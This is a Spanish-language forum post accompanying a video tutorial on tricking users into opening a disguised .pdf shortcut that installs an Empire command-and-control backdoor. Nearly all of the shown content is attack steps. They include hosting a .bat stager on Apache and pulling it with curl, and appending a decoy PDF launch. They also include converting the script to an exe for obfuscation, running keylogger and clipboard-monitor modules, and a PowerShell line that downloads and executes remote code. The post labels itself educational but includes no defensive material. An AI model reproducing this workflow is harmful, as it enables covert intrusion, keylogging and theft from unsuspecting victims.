Página 1 de 1

COMO HACKERS ACCEDEN a tu PC con un PDF | Seguridad informatica

Publicado: 17 Abr 2025, 21:19
por admin
En este video, explicaremos cómo generar una carga útil y un receptor mediante Empire, y cómo engañar a los usuarios para que hagan clic en un acceso directo .pdf con esa puerta trasera. ¡Así es como los hackers se apoderan de tu dispositivo!
También hablaremos sobre cómo detectar, prevenir y defenderse de este tipo de ataques, tanto si eres principiante en ciberseguridad como si ya trabajas en el sector. Si estás estudiando hacking ético o buscas mejorar tus habilidades, te sugiero que esta es una demostración valiosa y realista de cómo se llevan a cabo los ataques en el mundo real.

Disclaimer / Descargo de responsabilidad: este canal es estrictamente educativo para aprender sobre ciberseguridad y Redes de Computadoras.


¡Ayudame con un café! Si te sirvió algún vídeo del canal y te gustaría colaborar con mi trabajo, podés "invitarme un cafecito", por muy poca plata :
Siempre es de agradecer algún tipo de donación para seguir adelante con el canal.


🤗  https://bit.ly/3tNvPEd  | Mercado Pago
🤗  https://cafecito.app/rogerbiderbost
🤗  https://www.paypal.com/paypalme/rgbdonacion
🤗  https://airtm.me/roger6x28vhej


Imagen

LABORATORIO

Imagen


COMANDOS USADOS

Código: Seleccionar todo

empireadmin
password123

Levanta con este comando, tengo entendido que seria la parte cli

./ps-empire server


/etc/apache2/ports.conf
Puerto apache 8081 por defecto | Servicio Web

sudo service apache2 start


sudo mv launchclear2.bat /var/www/html


curl 192.168.10.219:8081/launchclear2.bat > launchclear2.bat


agregar al archivo .bat

start /b %~dp0LOQ_15IRX9_Spec.pdf

usar el bat converter to exe para ofuscarlo mas todavia


Modulos usados

dejar mensaje --------------> Powershell_trollsploit_message

KeyLogger --------------------> powershell_collection_keylogger


Clipboard monitor -------------> powershell_collection_clipboard_monitor


escanear puertos --------------> powershell_situational_awareness_network_portscan


start-process "powershell.exe" -argumentlist '-command',"irm https://www.leeholmes.com/projects/ps_html5/Invoke-PSHtml5.ps1 | iex"
LINKS IMPORTANTES


https://github.com/BC-SECURITY/Empire

https://bc-security.gitbook.io/empire-w ... stallation

https://www.cyberciti.biz/faq/linux-apa ... ipbinding/

https://superuser.com/questions/1644520 ... ue-in-kali

Stagers
https://aceresponder.com/blog/exploitin ... -framework




VIDEO TUTORIAL








CyberSecurity,InfoSec,Ethical Hacking,Hacking Etico,Kali Linux,Red team,Pentesting,Vulnerability,Ingenieria Social,social engineering,sistemas de seguridad,Payloads,Network Hacking,Post Exploitation,Programming,OSINT,Cyber Seguridad